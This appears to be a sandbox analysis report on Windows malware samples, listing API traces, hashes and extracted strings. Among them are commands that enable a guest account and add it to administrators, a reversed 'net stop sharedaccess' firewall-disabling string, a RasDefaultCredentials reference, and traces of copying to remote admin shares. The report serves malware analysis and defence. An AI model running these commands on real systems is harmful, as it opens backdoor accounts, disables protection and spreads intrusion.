                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                                • String ID:
                                • API String ID: 136543108-0
                                • Opcode ID: 3baf7999bc17034cde08045e60d2599934fcebe03a3ba73ab888b9dc19cb423c
                                • Instruction ID: 93ec0bc8b686358acc24e3714501cd84e213c2281eabc8766456639a8591c71b
                                • Opcode Fuzzy Hash: 3baf7999bc17034cde08045e60d2599934fcebe03a3ba73ab888b9dc19cb423c
                                • Instruction Fuzzy Hash: C3115E34104B919FE312DB24C844B5BB7E9EB85724F408A0DF0A6566D1CBB868098BA2
                                APIs
                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B04E
                                • lstrlen.KERNEL32(?), ref: 1000B05E
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000002,?,00000000), ref: 1000B074
                                • RegCloseKey.ADVAPI32(?), ref: 1000B084
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValuelstrlen
                                • String ID:
                                • API String ID: 1356686001-0
                                • Opcode ID: 6f469cda0b208e0ca63033edd93a9e46ed06a8d285518f132b144785bc4708a2
                                • Instruction ID: 7b49051102f8b3a7e04b5e6a6f77e5ac8f95ad15ac6f50b5fbf7acef8fa67196
                                • Opcode Fuzzy Hash: 6f469cda0b208e0ca63033edd93a9e46ed06a8d285518f132b144785bc4708a2
                                • Instruction Fuzzy Hash: 50F0D0753443527FF620CB50CD89F6B77EDEB88B50F108908F685A6190D6B0FD418B66
                                APIs
                                • Sleep.KERNEL32(00000001), ref: 100114BF
                                • TerminateThread.KERNEL32(?,00000000), ref: 100114D8
                                • Sleep.KERNEL32(00000001), ref: 100114E0
                                • TerminateProcess.KERNEL32(?,00000001), ref: 100114E8
                                  • Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                  • Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
                                  • Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                  • Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
                                  • Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: SleepTerminate$CancelEventExchangeInterlockedProcessThreadclosesocketsetsockopt
                                • String ID:
                                • API String ID: 3242870944-0
                                • Opcode ID: 8e484390c704dc857f177f1c773443b864ffa47019b696dc8a7e0cee6581ed40
                                • Instruction ID: c378b0861d785e21301bdfc87bc3ab075883bb077402934db3b02ae2e10452dd
                                • Opcode Fuzzy Hash: 8e484390c704dc857f177f1c773443b864ffa47019b696dc8a7e0cee6581ed40
                                • Instruction Fuzzy Hash: D9F03732200350ABE310EB65CC85F5BB3A5BB88720F004A1DF6959B2D0D7B0E8448B51
                                APIs
                                • GetInputState.USER32 ref: 100067F3
                                • GetCurrentThreadId.KERNEL32 ref: 100067FF
                                • PostThreadMessageA.USER32(00000000), ref: 10006806
                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageThread$CurrentInputPostState
                                • String ID:
                                • API String ID: 2517755969-0
                                • Opcode ID: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                                • Instruction ID: be37903158f8ce1355c4e343a4486a1e9724d5febc653840301b138d8f38b73e
                                • Opcode Fuzzy Hash: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                                • Instruction Fuzzy Hash: 60D0C77168036077FB107BE48C4FF463A297B04B01F900454F705DA1E1D6F456148B67
                                APIs
                                • CoCreateInstance.OLE32(10077218,00000000,00000001,10077188,00000000,00000000,?,10068F9D,?,?,?,?), ref: 10069393
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInstance
                                • String ID: FriendlyName
                                • API String ID: 542301482-3623505368
                                • Opcode ID: 9d1032148119b2da218872289ef4e99e1cb5796a42506ce89b41a72a847b9d01
                                • Instruction ID: 258e8a263c28d7347944fa1d558e3935b77094b7b272d9d199a9c21f0b65fa88
                                • Opcode Fuzzy Hash: 9d1032148119b2da218872289ef4e99e1cb5796a42506ce89b41a72a847b9d01
                                • Instruction Fuzzy Hash: 26512671204241AFC700DF58C8C4E9AB7EAFBC9724F508A6DF5998B251C735EC86CB62
                                APIs
                                • GetCPInfo.KERNEL32(?,00000000), ref: 004049A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Info
                                • String ID: $
                                • API String ID: 1807457897-3032137957
                                • Opcode ID: ae83eec624f04b339c206aedc32f167b1e4519e52e6f01105cbc9eef7ef967dd
                                • Instruction ID: b87dcbb75cd3c471051da0e28ff986719ac4621f1c2140c0425cb5d80edd0c9f
                                • Opcode Fuzzy Hash: ae83eec624f04b339c206aedc32f167b1e4519e52e6f01105cbc9eef7ef967dd
                                • Instruction Fuzzy Hash: 774167B12041585EFB12C660DD49BFB3FB89B46700FD400F6D649EA1D2C2794918CBAE
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: _ftol
                                • String ID: *,
                                • API String ID: 2545261903-327129236
                                • Opcode ID: f28266acba0517d0ef76b8f63368f88f2e3b972e201cca309f8e098b87e9ab43
                                • Instruction ID: accb0fd77c38b38dac35c35713d96fe46105689da0a5d4e94071b2b8a9246534
                                • Opcode Fuzzy Hash: f28266acba0517d0ef76b8f63368f88f2e3b972e201cca309f8e098b87e9ab43
                                • Instruction Fuzzy Hash: 1E11E676B082295BD350CF2AD88069E7BE5EB85BE1F32413AE408D7211D7319C948FD6
                                APIs
                                • WinExec.KERNEL32(00000000,00000000), ref: 1000B346
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exec
                                • String ID: /del$net user
                                • API String ID: 459137531-2512890511
                                • Opcode ID: 78dea157b794ebc47affa29f65fdeb0e2daad498c184a7a1bd52b5e36626c8a0
                                • Instruction ID: 5dd7e995ff607eb42942ab6a2a69a7874cb309585a325c5644f1848542d2a52f
                                • Opcode Fuzzy Hash: 78dea157b794ebc47affa29f65fdeb0e2daad498c184a7a1bd52b5e36626c8a0
                                • Instruction Fuzzy Hash: 3B11BE36600A045BD718CA78D89066BB6D2FBC4330F148B3EFA66C32D0EEB59D49C245
                                APIs
                                • EnumWindows.USER32(Function_0000C600,00000000), ref: 1000CB8E
                                  • Part of subcall function 10003E30: _ftol.MSVCRT ref: 10003E6F
                                  • Part of subcall function 10003E30: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@EnumWindows_ftol
                                • String ID: {$|
                                • API String ID: 1507428005-264143378
                                • Opcode ID: 3e740fe28869a124bf14874d3fa4f51034db2774c9377083249108f83c0ded99
                                • Instruction ID: b21fffd7c8efe6577bddb62a25c2f06230fca87104460267a0584959008793d5
                                • Opcode Fuzzy Hash: 3e740fe28869a124bf14874d3fa4f51034db2774c9377083249108f83c0ded99
                                • Instruction Fuzzy Hash: F301DB32604188DFE714DF68D85ABAEB7D5FB84310F40826EE90A972C1CBB55E05C750
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006843
                                • sprintf.MSVCRT ref: 1000688E
                                Strings
                                • \Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 10006849
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: DirectorySystemsprintf
                                • String ID: \Program Files\Internet Explorer\IEXPLORE.EXE
                                • API String ID: 2264545904-1152295267
                                • Opcode ID: f076004f84cb907a7609523adf1ec212d4f6e7c5108ce2d61a9f53a1d08a3bc1
                                • Instruction ID: 99df4ed59750c9dd993d51c468aa5d343e53be9d723c6599038c39a96e95830f
                                • Opcode Fuzzy Hash: f076004f84cb907a7609523adf1ec212d4f6e7c5108ce2d61a9f53a1d08a3bc1
                                • Instruction Fuzzy Hash: 8DF0F6326042042BD3188678DC99BDB7B8AEBC4331F54872EFAA6872C0D9B98908C255
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exec_strrev
                                • String ID: sseccaderahs pots ten
                                • API String ID: 37789026-4286520837
                                • Opcode ID: b16de7f109e9ee2caeba731d9e336f4db8808fa970a32cde9eb3490c8bfceb06
                                • Instruction ID: c3e97b05e1a0e89978fc418c8abf29a90b807b51c292c120b08a6d1b6e549f13
                                • Opcode Fuzzy Hash: b16de7f109e9ee2caeba731d9e336f4db8808fa970a32cde9eb3490c8bfceb06
                                • Instruction Fuzzy Hash: 2EF0A77650060017D7189639DC556DB7B96ABC5320F44462CF75B872D0D9B98908C281
                                APIs
                                Strings
                                • cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add, xrefs: 1000B394
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Execwsprintf
                                • String ID: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
                                • API String ID: 3709078785-529560147
                                • Opcode ID: 3eb5af844a6475c9db260c789b29842549fd0aeca9e9fd6efd0d275bca71aca5
                                • Instruction ID: 0a7898c6996eab9a84bb7628cc6b94f02dfbc87351f9717496f3ad2297c58d40
                                • Opcode Fuzzy Hash: 3eb5af844a6475c9db260c789b29842549fd0aeca9e9fd6efd0d275bca71aca5
                                • Instruction Fuzzy Hash: 0FF0E5B56043007BF310C768DC44B8BB6A5ABD4704F00C939FB84D22A0EAF9D958C55A
                                APIs
                                • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402245
                                • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402279
                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402293
                                • HeapFree.KERNEL32(00000000,?,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 004022AA
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AllocHeap$FreeVirtual
                                • String ID:
                                • API String ID: 3499195154-0
                                • Opcode ID: 71ee379a2087e103e6e659a8a3a3a0c42074fd8c15ad1c352f7fb21626a1355d
                                • Instruction ID: 68bd45274bd7996747cb266cb4e28ae1d64785b643fce2e0ad39ffcb9bf25311
                                • Opcode Fuzzy Hash: 71ee379a2087e103e6e659a8a3a3a0c42074fd8c15ad1c352f7fb21626a1355d
                                • Instruction Fuzzy Hash: 4D111C30200201AFD7319F58ED49E237BB5FBA47147A00639E556D61F1C7F0695ACB18
                                APIs
                                • lstrlen.KERNEL32(?,?,?,?,100071F6,?,?,?,L$_RasDefaultCredentials#0), ref: 1000716E
                                • malloc.MSVCRT ref: 10007186
                                • lstrlen.KERNEL32(?,00000000,4C8D0824,L$_RasDefaultCredentials#0,?,?,?,?,?,?,?,?,10007451,?), ref: 1000719B
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,10007451,?), ref: 100071A3
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$ByteCharMultiWidemalloc
                                • String ID:
                                • API String ID: 3822420913-0
                                • Opcode ID: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                                • Instruction ID: a4b6d9cd29bce437580047181b5565ca307375c70172c03540230846982f558e
                                • Opcode Fuzzy Hash: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                                • Instruction Fuzzy Hash: F7F0A7B21403526BF2209B54CC8AE7BB3BCEF89721F00442DF585C7240D668A805C372

                                Execution Graph

                                Execution Coverage:25.5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:21.5%
                                Total number of Nodes:618
                                Total number of Limit Nodes:11

                                Callgraph

                                • Executed
                                • Not Executed
                                • Opacity -> Relevance
                                • Disassembly available
                                [Callgraph: rendered node/edge list not reproduced]

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                [Control-flow graph: rendered node/edge list not reproduced]
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                • GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                • GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                • GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                • memset.MSVCRT ref: 004060F2
                                • _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                • _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                • _mbscpy.MSVCRT(0000005D,00000058), ref: 004062B5
                                • _mbscpy.MSVCRT(0000005D,2003), ref: 004062E7
                                • _mbscpy.MSVCRT(0000005D,Vista), ref: 00406323
                                • _mbscpy.MSVCRT(0000005D,2008), ref: 00406345
                                • _mbscpy.MSVCRT(0000005D,00000037), ref: 00406382
                                • _mbscpy.MSVCRT(0000005D,2008R2), ref: 004063A4
                                • _mbscpy.MSVCRT(0000005D,00000038), ref: 004063E4
                                • _mbscpy.MSVCRT(0000005D,2012), ref: 00406406
                                • _mbscpy.MSVCRT(0000005D,8.1), ref: 00406438
                                • sprintf.MSVCRT ref: 0040649C
                                • _mbscpy.MSVCRT(0000005D,?), ref: 004064B3
                                • lstrcpy.KERNEL32(00000000,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 004064E0
                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00406500
                                • RegQueryValueExA.KERNELBASE(?,~MHz,00000000,00000004,?,000000C8), ref: 00406545
                                • RegCloseKey.KERNELBASE(?), ref: 00406552
                                • GetSystemInfo.KERNELBASE(?), ref: 0040655F
                                • memset.MSVCRT ref: 00406570
                                • sprintf.MSVCRT ref: 004065B5
                                • _mbscpy.MSVCRT(-00000003,?), ref: 004065CC
                                • _mbscpy.MSVCRT(-00000003,Find CPU Error), ref: 0040664D
                                • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00406666
                                • __aulldiv.LIBCMT ref: 00406681
                                • __aulldiv.LIBCMT ref: 0040668F
                                • wsprintfA.USER32 ref: 004066B4
                                • malloc.MSVCRT ref: 004066C9
                                • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 004066DD
                                • free.MSVCRT ref: 004066EB
                                • malloc.MSVCRT ref: 004066F8
                                • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 0040670C
                                • strcmp.MSVCRT ref: 00406731
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                • sprintf.MSVCRT ref: 004068CD
                                • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _mbscpy$Infosprintf$AdaptersAddressLibraryLoadProcSystemTable__aulldivmallocmemset$??2@CloseDefaultGlobalLanguageMemoryOpenQueryStatusValuefreelstrcpystrcmpwsprintf
                                • String ID: %d*%u%s$%s %s %s%d$%u Gbps$%u MB$%u Mbps$0.0.0.0$2000$2003$2008$2008R2$2012$7$8$8.1$>2l$@$ADVAPI32.dll$Find CPU Error$GetVersionExA$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KERNEL32.dll$KVa7$KVa7$MHz$N$P$P$RegCloseKey$S$T$Vista$Win$X$z$~MHz
                                • API String ID: 3282488517-2071344246
                                • Opcode ID: 63299a0e361551339f6c41bc8fa1acc0d5ed4ae0495ff8515c854c0289c22c81
                                • Instruction ID: 4060d5c4243dd63f8f5c6b2b41416773b41649e27dbdc5ec35ba0ab2f083b483
                                • Opcode Fuzzy Hash: 63299a0e361551339f6c41bc8fa1acc0d5ed4ae0495ff8515c854c0289c22c81
                                • Instruction Fuzzy Hash: 3B32B170904258DBEB21CB54CD48BDEBBB8AF15308F0440EDE14D7A291D7B99B98CF69

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA,administrator,004095E4,00000000), ref: 00402AEC
                                • GetProcAddress.KERNEL32(00000000), ref: 00402AF5
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00402B04
                                • GetProcAddress.KERNEL32(00000000), ref: 00402B07
                                • LoadLibraryA.KERNELBASE(mpr.dll), ref: 00402B11
                                • GetProcAddress.KERNEL32(00000000,WNetAddConnection2A), ref: 00402B19
                                • memset.MSVCRT ref: 00402B36
                                • lstrcmp.KERNEL32(004030B7,NULL), ref: 00402B46
                                • sprintf.MSVCRT ref: 00402B64
                                  • Part of subcall function 00402A92: GetModuleFileNameA.KERNELBASE(00000000,00000000,00000104,00000001), ref: 00402AC1
                                • sprintf.MSVCRT ref: 00402BA6
                                • WNetAddConnection2A.MPR(?,004030B7,?,00000000), ref: 00402BDF
                                • Sleep.KERNELBASE(000000C8), ref: 00402BF5
                                • memset.MSVCRT ref: 00402C09
                                • sprintf.MSVCRT ref: 00402C1D
                                • CopyFileA.KERNEL32(00000000,?,00000000), ref: 00402C3F
                                • memset.MSVCRT ref: 00402C53
                                • sprintf.MSVCRT ref: 00402C67
                                • memset.MSVCRT ref: 00402C9D
                                • sprintf.MSVCRT ref: 00402CB1
                                • memset.MSVCRT ref: 00402CE7
                                • sprintf.MSVCRT ref: 00402CFB
                                • memset.MSVCRT ref: 00402D2D
                                • sprintf.MSVCRT ref: 00402D41
                                • GetLocalTime.KERNEL32(?), ref: 00402D6C
                                • memset.MSVCRT ref: 00402D7B
                                • sprintf.MSVCRT ref: 00402DA2
                                • WinExec.KERNEL32(?,00000000), ref: 00402DAF
                                • Sleep.KERNEL32(000007D0), ref: 00402DC4
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
